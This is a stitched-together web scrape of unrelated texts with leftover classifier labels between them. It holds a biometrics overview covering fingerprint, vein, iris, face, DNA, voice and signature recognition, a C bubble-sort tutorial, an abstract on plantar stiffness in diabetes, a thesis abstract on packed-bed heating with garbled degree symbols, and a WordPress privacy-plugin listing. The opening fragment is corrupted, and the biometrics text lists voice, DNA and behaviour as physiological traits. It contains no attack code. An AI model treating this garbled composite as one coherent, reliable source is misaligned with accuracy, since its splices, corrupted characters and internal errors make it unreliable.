typing rhythm, gait, and voice. Some researchers have coined the term spectacularscarecrowΤεχνίτη Νοημοσύνη και Ρομποτική 17 Νοε 2013 (πριν από 4 χρόνια και 5 μήνες) 121 εμφανίσεις Biometric identification Biometrics refers to the identification of humans by their characteristics or traits. Biometrics is used in computer science as a form of identification and access control. It is also used to identify individuals in groups that are under surveillance. Biometric identifiers are the distinctive, measurable characteristics used to label and describe individuals. Biometric identifiers are often categorized as physiological versus behavioral characteristics. A physiological biometric would identify by one's voice, DNA, hand print or behavior. Behavioral biometrics are related to the behavior of a person, including but not limited to: typing rhythm, gait, and voice. Some researchers have coined the term behaviometrics to describe the latter class of biometrics. More traditional means of access control include token - based identification systems, such as a driver's license or passport, and knowledge - based identification systems, such as a password or personal identification number. Since biometric identifiers are unique to individuals, they are more reliable in verifying identity than token and knowledge - based methods; however, the collection of biometric identifiers raises privacy concerns about the ultimate use of this information. A fingerprint in its narrow sense is an impression left by the friction ridges of a human finger.[1] In a wider use of the term, fingerprints are the traces of an impression from the friction ridges of any part of a human or other primate hand. A print from the foot can also leave an impression of friction ridges. A friction ridge is a raised portion of the epidermis on the digits (fingers and toes), the palm of the hand or the sole of the foot, consisting of one or more connected ridge units of friction ridge skin.[1] These are sometimes known as "epidermal ridges" which are caused by the underlying interface between the dermal papillae of the dermis and the interpapillary (rete) pegs of the epidermis. These epidermal ridges serve to amplify vibrations triggered, for example, when fingertips brush across an uneven surface, better transmitting the signals to sensory nerves involved in fine texture perception.[2] These ridges may also assist in gripping rough surfaces and may improve surface contact in wet conditions.[3] Impressions of fingerprints may be left behind on a surface by the natural secretions of sweat from the eccrine glands that are present in friction ridge skin, or they may be made by ink or other substances transferred from the peaks of friction ridges on the skin to a relatively smooth surface such as a fingerprint card.[4] Fingerprint records normally contain impressions from the pad on the last joint of fingers and thumbs, although fingerprint cards also typically record portions of lower joint areas of the fingers. Fingerprint Finger vein recognition is a method of biometric authentication that uses pattern - recognition techniques based on images of human finger vein patterns beneath the skin's surface. Finger vein recognition is one of many forms of biometrics used to identify individuals and verify their identity. Finger Vein ID is a biometric authentication system that matches the vascular pattern in an individual's finger to previously obtained data. Hitachi developed and patented a finger vein ID system in 2005.[1] The technology is currently in use or development for a wide variety of applications, including credit card authentication, automobile security, employee time and attendance tracking, computer and network authentication, end point security and automated teller machines. To obtain the pattern for the database record, an individual inserts a finger into an attester terminal containing a near - infrared LED (light - emitting diode) light and a monochrome CCD (charge - coupled device) camera. The hemoglobin in the blood absorbs near - infrared LED light, which makes the vein system appear as a dark pattern of lines. The camera records the image and the raw data is digitized, certified and sent to a database of registered images. For authentication purposes, the finger is scanned as before and the data is sent to the database of registered images for comparison. The authentication process takes less than two seconds.[2] Blood vessel patterns are unique to each individual, as are other biometric data such as fingerprints or the patterns of the iris. Unlike some biometric systems, blood vessel patterns are almost impossible to counterfeit because they are located beneath the skin's surface. Biometric systems based on fingerprints can be fooled with a dummy finger fitted with a copied fingerprint; voice and facial characteristic - based systems can be fooled by recordings and high - resolution images. The finger vein ID system is much harder to fool because it can only authenticate the finger of a living person.[3] Finger vein recognition Iris recognition Iris recognition is an automated method of biometric identification that uses mathematical pattern - recognition techniques on video images of the irides of an individual's eyes, whose complex random patterns are unique and can be seen from some distance. Not to be confused with another, less prevalent, ocular - based technology, retina scanning, iris recognition uses camera technology with subtle infrared illumination to acquire images of the detail - rich, intricate structures of the iris. Digital templates encoded from these patterns by mathematical and statistical algorithms allow the identification of an individual or someone pretending to be that individual.[1] Databases of enrolled templates are searched by matcher engines at speeds measured in the millions of templates per second per (single - core) CPU, and with infinitesimally small False Match rates. Many millions of persons in several countries around the world have been enrolled in iris recognition systems, for convenience purposes such as passport - free automated border - crossings, and some national ID systems based on this technology are being deployed. A key advantage of iris recognition, besides its speed of matching and its extreme resistance to False Matches, is the stability of the iris as an internal, protected, yet externally visible organ of the eye. In 1987 two Ophthalmology Professors, Leonard Flom, M.D.(NYU) and Aran Safir,M.D.(U.Conn), were issued a first of its kind, broad patent # 4,641,349 entitled "Iris Recognition Technology." Subsequently, John Daugman,PhD (Harvard Computer Science faculty) was then salaried by both ophthalmologists to write the algorithm for their concept based upon an extensive series of high resolution iris photos supplied to him by Dr.Flom from his volunteer private patients. Several years later, Daugman received a method patent for the algorithm and a crudely constructed prototype proved the concept. The three individuals then founded "IridianTechnologies,Inc." and assigned the Flom/Safir patent to that entity that was then capitalized by GE Capital, a branch of "GE"(General Electric) and other investors. "Iridian" then licensed several corporations to the exclusive Daugman algorithm under the protection of the Flom/Safir broad umbrella patent listed above; thus, preventing other algorithms from competing. Upon expiration of the Flom/Safir patent in 2008 other algorithms were patented and several were found to be superior to Daugman's and are now being funded by U.S. Government agencies. A facial recognition system is a computer application for automatically identifying or verifying a person from a digital image or a video frame from a video source. One of the ways to do this is by comparing selected facial features from the image and a facial database. It is typically used in security systems and can be compared to other biometrics such as fingerprint or eye iris recognition systems.[1] Facial recognition DNA profiling DNA profiling (also called DNA testing, DNA typing, or genetic fingerprinting) is a technique employed by forensic scientists to assist in the identification of individuals by their respective DNA profiles. DNA profiles are encrypted sets of numbers that reflect a person's DNA makeup, which can also be used as the person's identifier. DNA profiling should not be confused with full genome sequencing.[1] It is used in, for example, parental testing and criminal investigation. Although 99.9% of human DNA sequences are the same in every person, enough of the DNA is different to distinguish one individual from another, unless they are monozygotic twins.[2] DNA profiling uses repetitive ("repeat") sequences that are highly variable,[2] called variable number tandem repeats (VNTRs), particularly short tandem repeats (STRs). VNTR loci are very similar between closely related humans, but so variable that unrelated individuals are extremely unlikely to have the same VNTRs. The DNA profiling technique was first reported in 1984[3] by Sir Alec Jeffreys at the University of Leicester in England,[4] and is now the basis of several national DNA databases. Dr. Jeffreys's genetic fingerprinting was made commercially available in 1987, when a chemical company, Imperial Chemical Industries (ICI), started a blood - testing centre in England.[5] Speaker recognition Speaker recognition[1] is the identification of the person who is speaking by characteristics of their voices (voice biometrics), also called voice recognition.[2][3][4][5][6][7] There is a difference between speaker recognition (recognizing who is speaking) and speech recognition (recognizing what is being said). These two terms are frequently confused, and "voice recognition" can be used for both. In addition, there is a difference between the act of authentication (commonly referred to as speaker verification or speaker authentication) and identification. Finally, there is a difference between speaker recognition (recognizing who is speaking) and speaker diarisation (recognizing when the same speaker is speaking). Recognizing the speaker can simplify the task of translating speech in systems that have been trained on specific person's voices or it can be used to authenticate or verify the identity of a speaker as part of a security process. Speaker recognition has a history dating back some four decades and uses the acoustic features of speech that have been found to differ between individuals. These acoustic patterns reflect both anatomy (e.g., size and shape of the throat and mouth) and learned behavioral patterns (e.g., voice pitch, speaking style). Speaker verification has earned speaker recognition its classification as a "behavioral biometric". Signature recognition Signature recognition is a behavioural biometric. It can be operated in two different ways: Static: In this mode, users write their signature on paper, digitize it through an optical scanner or a camera, and the biometric system recognizes the signature analyzing its shape. This group is also known as “off - line”. Dynamic: In this mode, users write their signature in a digitizing tablet, which acquires the signature in real time. Another possibility is the acquisition by means of stylus - operated PDAs. Dynamic recognition is also known as “on - line”. Dynamic information usually consists of the following information: spatial coordinate x(t) spatial coordinate y(t) pressure p(t) azimuth az(t) inclination in(t) The state - of - the - art in signature recognition can be found in the last major international competition.[1] The most popular pattern recognition techniques applied for signature recognition are Dynamic Time Warping (DTW), Hidden Markov Models (HMM) and Vector Quantization (VQ). Combinations of different techniques also exist.[2]
__label__pos
0.831349
F How to implement bubble sort in array? [C] | CodeTheta How to implement bubble sort in array? [C] Here you can see a bubble sort programming code which is written in c programming.it is a most popular sort in data structure. in this code you can see the array is defined .the array which is defined in the code is a static array mean its size is fixed after that we have defined four variable and one of them is temp whose job is store the variable for temporarily. Source Code : /*   Program to implement BUBLE SORTING in Array.   http://www.codetheta.com   -------------------------------------------- */ #include<stdio.h> #include<conio.h> void main() { int a[10],i,j,k,temp; clrscr(); printf("\n Enter the values of Array A -> \n"); for(i=0;i<10;i++)    scanf("%d",&a[i]); //Sorting for(i=0;i<9;i++)    for(j=0;j<9-i;j++)       {       printf("\n i=%d , j=%d -> ",i+1,j+1);       for(k=0;k<10;k++)          printf("%d  ",a[k]);       if(a[j+1]<a[j])         {         temp=a[j+1];         a[j+1]=a[j];         a[j]=temp;         }       } printf("\n The sorted array is -> "); for(i=0;i<10;i++)    printf("%d  ",a[i]); getch(); } Try this code in your computer for better understanding. Enjoy the code. If you have any Question you can contact us or mail us. Post a Comment
__label__pos
0.804542
Publications Back January 2020 A Method to Analyse Plantar Stiffness Variation in Diabetes Using Myotonometric Measurements Authors: Shib Banerjee, Lakshmi Lasya Sreeramgiri, Hariram S, Srivatsa Ananthan, Ramakrishnan Swaminathan Affiliations: 1. Department of Applied Mechanics, IIT madras, Chennai, India 2. Karuvee Innovations Pvt. Ltd., IIT Madras Research Park, Chennai, India 3. Sree Clinic and Diabetic Centre, 20, Besant Ave Rd, Padmanabha Nagar, Adyar, Chennai, India Journal: Journal of Medical Devices - March 2020, 14(1): 011105 (6 pages) (DOI: doi:10.1115/1.4045838) Diabetes mellitus is a group of metabolic disease which has become globally prevalent, and affects a large population in socio-economically backward countries in Asian continent. Chronic diabetes can lead to ulceration in the plantar region and may result in amputation. Assessment of mechanical properties of plantar tissues can aid in early diagnosis of ulceration. Myotonometry, a technique to measure dynamic stiffness is preferred due to its noninvasiveness, easy employability and rapid investigation. In this study, an attempt has been made to analyze the changes in soft tissue biomechanical properties of plantar surface in diabetes. MyotonPRO, a handheld device, is used for this purpose. 43 diabetic subjects with varied duration of diabetes are recruited. Site-specific mechanical properties of the plantar region for both the feet are acquired and statistical analysis is performed. Results show that the MyotonPRO is able to differentiate the stages of diabetes. It is seen that there is spatial variability in mechanical properties. Additionally, it is observed that there is a significant increment in the plantar stiffness value in the group with higher diabetic age (p < 0.05). Further, significant changes in dynamic mechanical properties is also observed in sub-metatarsal region. Additionally, a right-left asymmetry has been observed in frequency and stiffness values for later stages of diabetes. This study demonstrated the feasibility of MyotonPRO in discriminating the stages of diabetic period. Thus, the proposed approach could be useful in early diagnosis of foot ulceration for various clinical conditions. Diabetes is known to increase the overall stiffness of plantar aspect of foot due to structural change in the epidermal layers and collagenous network of plantar fascia. Analysis of mechanical properties of plantar regions plays a crucial role in diagnosis of ulceration, diabetic lesion, and clinical studies. Late diagnosis in ulceration may lead to amputation. Further, measuring dynamic stiffness of tissue using non-invasive technique is still a challenging task. Myotonometery is a noninvasive techniques used to assess the biomechanical properties of tissue and is widely preferred for clinical studies. In this study, an attempt has been made to assess the dynamic mechanical properties of plantar regions using MyotonPRO, a handheld myotonometry-based device. Site-specific biomechanical properties of plantar regions are acquired from subjects with different duration of diabetes. The results demonstrates that MyotonPRO is sensitive to the variation of biomechanical properties of plantar tissue at different stages of diabetes. The average stiffness has been found to be significantly high for groups with long (> 10 years) duration of diabetes when compared to groups of shorter diabetic age (< 10 years) [616.87 vs. 661.46 N/mm, p=0.01]. Increasing trend is observed in the frequency and stiffness values of submetatarsal regions. 1MST has demonstrated significant increment in stiffness in longer exposure of diabetes mellitus. In addition, an asymmetry is also observed in the frequency and stiffness values of left-right pair. The results indicate that the MyotonPRO can be potentially used to enhance early diagnosis of ulceration. The future extension of this work will be a longitudinal study of the subject specific variation of biomechanical properties of plantar with prognosis of diabetes in close collaboration with the clinicians. Back
__label__pos
0.866877
Date of Award 2015-01-01 Degree Name Master of Science Department Mechanical Engineering Advisor(s) Arturo Bronson Second Advisor Vinod Kumar Abstract The transient surface temperature of particles within a packed bed was simulated to enable ultimately the prediction of plasma-surface reactions at ultrahigh temperatures. The motivation for the present study was along two fronts - the reactive infusion of liquid alloys at ultrahigh temperatures to process metal matrix or ceramic matrix composites and the plasma processing of materials to spike the surface temperatures to enable the formation of protective oxidizing scales on ultrahigh ceramic composites. The transient temperature simulations determined that a graphite crucible containing B4C spherical particles heated from 298 to 2128 K and 2504 K occurred in about 900 s. After placing a Hf disk on top of the packed bed, a thermal steady-state condition was reached in 900 s when the disk attained 2231â??. With a Zr disc replacing Hf, a thermal steady-state condition was reached in 900 s attaining 1855â??. This resulted because Hf and Zr have similar heat transfer coefficients and because above 1000â??, radiation is the main method of heat transfer. Even though the system with Hf was heated to a higher temperature, it took about the same time for both systems to reach steady-state. A parabolic behavior was seen at starting times since the temperature difference was greater. As time progressed, the temperature gradient became linear until reaching steady-state. The temperature spike for both Zr and Hf caused a sharp temperature gradient within approximately 0.3 cm, which could be significant in controlling the precipitation of phases (i.e., boride or carbide) during processing. The oxidation of Ti particles to rutile within a packed bed were also studied at a constant temperature of 1700â??, the concentration of Ti and TiO2 species were plotted. processing temperature may cause a significant temperature gradient along the cross-section of the bed depending on its content of reactive metals, the effects of temperature however, should be simulated in future work. The oxygen potential affects the plasma-surface reactions appear, as expected, though the adsorption and desorption of oxygen becomes more difficult to assess with decreasing oxygen atmospheres. The error in predictability with decreasing oxygen partial pressures less than 10-6 atm may become problematic, because plasma-surface reactions may occur at oxygen potentials less than 10-20 atm when processing elements from the Ti or rare earth metals family. The power used to generate the plasma atmosphere influences the adsorption and desorption of oxygen occurring on surfaces. The adsorption and desorption of the oxygen depends on a rate-determining step involving surface sites within a plasma atmosphere as similarly obtained for oxygen interacting with surfaces without a plasma atmosphere. Language en Provenance Received from ProQuest File Size 50 pages File Format application/pdf Rights Holder Alejandro Garcia Included in Engineering Commons Share COinS      
__label__pos
0.918305
WordPress.org Ready to get started?Download WordPress Plugin Directory WP DoNotTrack WP DoNotTrack stops plugins/ themes from adding tracking code or cookies, protecting visitor privacy and providing performance and security benefits. Just install form your WordPress "Plugins|Add New" screen and all will be well. Manual installation is very straightforward as well: 1. Upload the zip-file and unzip it in the /wp-content/plugins/ directory 2. Activate the plugin through the 'Plugins' menu in WordPress 3. Configure on the admin-page Requires: 3.2 or higher Compatible up to: 3.4.2 Last Updated: 2012-8-21 Downloads: 8,104 Ratings 4 stars 4.8 out of 5 stars Support 0 of 1 support threads in the last two months have been resolved. Got something to say? Need help? Compatibility + = Not enough data 0 people say it works. 0 people say it's broken. 100,1,1 100,1,1 100,1,1 100,2,2 100,1,1 100,1,1 100,4,4 100,1,1 100,1,1 100,1,1 100,1,1 100,1,1 100,1,1 100,1,1 100,2,2 100,1,1 0,1,0 100,2,2 100,2,2 100,1,1 100,3,3 100,2,2 100,1,1 100,2,2 100,1,1
__label__pos
0.875439